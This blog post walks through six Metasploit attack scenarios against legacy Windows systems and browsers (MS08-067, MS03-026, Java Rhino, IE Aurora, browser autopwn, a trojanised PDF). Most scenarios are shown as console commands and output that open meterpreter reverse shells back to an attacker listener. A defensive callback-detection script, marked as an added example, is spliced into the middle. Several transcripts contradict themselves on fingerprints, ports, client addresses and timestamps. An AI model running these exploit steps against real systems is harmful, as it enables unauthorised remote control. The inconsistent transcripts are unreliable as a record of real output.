Metasploit Scenarios


Hi, sorry that I haven't been posting much; I expect to be posting regularly again from the day after tomorrow. Well, this time I'm going to cover several attack scenarios using Metasploit.

Scenario 1: (Target: Windows XP SP2 and Windows XP SP3)
=================================================

msf > use windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms08_067_netapi) > set lhost 192.168.2.103
lhost => 192.168.2.103
msf  exploit(ms08_067_netapi) > set lport 4444
lport => 4444
msf  exploit(ms08_067_netapi) > set rhost 192.168.2.105
rhost => 192.168.2.105
msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on port 4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:Unknown
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:445)


Scenario 2: (Target: Windows NT 4.0 SP3, Windows 2000, Windows XP, Windows 2003 (English versions))
=================================================

msf > use exploit/windows/dcerpc/ms03_026_dcom
msf  exploit(ms03_026_dcom) > set rhost 192.168.2.105
rhost => 192.168.2.105
msf exploit(ms03_026_dcom) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms03_026_dcom) > set lport 4443
lport => 4443
msf  exploit(ms03_026_dcom) > set lhost 192.168.2.103
lhost => 192.168.2.103
msf  exploit(ms03_026_dcom) > exploit

[*] Started reverse handler on 192.168.2.103:4443
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.2.105[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.2.105[135] ...
[*] Sending exploit ...
[*] Sending stage (752128 bytes) to 192.168.2.105
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:1098) at Tue Jan 31 21:35:35 +0000 2012
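
For defenders, scenarios 1 and 2 leave the same network trace: an inbound connection to SMB (445) or RPC (135), then the target host connecting back to the same peer on the reverse_tcp handler port. The correlation below is an added example, not part of the original post; the flow-record format, the 60-second window and the sample records are constructed assumptions.

```python
from collections import namedtuple

# Constructed flow-record format (an assumption, not a real tool's schema).
Flow = namedtuple("Flow", "ts src sport dst dport")

EXPOSED_PORTS = {135, 445}  # RPC endpoint mapper and SMB, the services hit in scenarios 1 and 2
WINDOW = 60                 # seconds; assumed correlation window


def find_callbacks(flows, window=WINDOW):
    """Return (inbound, outbound) pairs where a host that has just received a
    connection on an exposed service port connects back to that same peer."""
    hits = []
    recent = {}  # (server, client) -> latest inbound flow to an exposed port
    for f in sorted(flows, key=lambda x: x.ts):
        if f.dport in EXPOSED_PORTS:
            recent[(f.dst, f.src)] = f
            continue
        inbound = recent.get((f.src, f.dst))
        if inbound and 0 <= f.ts - inbound.ts <= window:
            hits.append((inbound, f))
    return hits


# Constructed sample flows, reusing the lab addresses seen in the transcripts.
SAMPLE = [
    Flow(100, "192.168.2.103", 40112, "192.168.2.105", 445),
    Flow(102, "192.168.2.105", 1098, "192.168.2.103", 4444),  # callback 2s after SMB
    Flow(300, "192.168.2.100", 50001, "192.168.2.105", 445),  # ordinary file-share use
    Flow(305, "192.168.2.105", 1101, "192.168.2.1", 53),      # different peer, ignored
    Flow(500, "192.168.2.103", 40200, "192.168.2.105", 135),
    Flow(700, "192.168.2.105", 1105, "192.168.2.103", 4443),  # outside the window
]

if __name__ == "__main__":
    for inbound, outbound in find_callbacks(SAMPLE):
        print(f"ALERT {outbound.src} -> {outbound.dst}:{outbound.dport} "
              f"{outbound.ts - inbound.ts}s after inbound to port {inbound.dport}")
```
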

Scenario 3: (Target: Java Rhino)
=================================================

msf > use exploit/multi/browser/java_rhino
msf  exploit(java_rhino) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(java_rhino) > set lhost 192.168.2.103
lhost => 192.168.2.103
msf  exploit(java_rhino) > set lport 4444
lport => 4444
msf  exploit(java_rhino) > set uripath /
uripath => /
msf  exploit(java_rhino) > set srvhost 192.168.2.103
srvhost => 192.168.2.103
msf  exploit(java_rhino) > set srvport 80
srvport => 80
msf  exploit(java_rhino) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.2.103:4444
[*] Using URL: http://192.168.2.103:80/
[*] Server started.
msf  exploit(java_rhino) > [*] Java Applet Rhino Script Engine Remote Code Execution handling request from 192.168.2.100:50563...
[*] Sending Applet.jar to 192.168.2.100:50564...
[*] Sending Applet.jar to 192.168.2.100:50564...
[*] Sending stage (752128 bytes) to 192.168.2.105
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:1098) at Tue Jan 31 21:35:35 +0000 2012

Scenario 4: (Target: Internet Explorer 6)
=================================================

msf > use exploit/windows/browser/ms10_002_aurora
msf  exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms10_002_aurora) > set lhost 192.168.2.103
lhost => 192.168.2.103
msf  exploit(ms10_002_aurora) > set lport 4444
lport => 4444
msf  exploit(ms10_002_aurora) > set srvport 80
srvport => 80
msf  exploit(ms10_002_aurora) > set srvhost 192.168.2.103
srvhost => 192.168.2.103
msf  exploit(ms10_002_aurora) > set uripath /
uripath => /
msf  exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.2.103:4444
[*] Using URL: http://192.168.2.103:80/
[*] Server started.
msf  exploit(ms10_002_aurora) > [*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.2.105
[*] Sending stage (752128 bytes) to 192.168.2.105
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:1098) at Tue Jan 31 21:35:35 +0000 2012


Scenario 5: (Browser auto run)
Note: I haven't used this exploit myself, so I can only list the syntax.
=================================================
search for browser auto run (just use search)
set lhost 192.168.2.104
set uripath /
exploit 

Scenario 6: (Target: Windows (Executable (PDF)))
=================================================
use exploit/windows/fileformat/adobe_pdf_embedded_exe 
set INFILENAME /root/Desktop/Sample.pdf 
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST (LHOST)
exploit 

Listener
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.2.104 (LHOST)
exploit 

That's all, thank you.
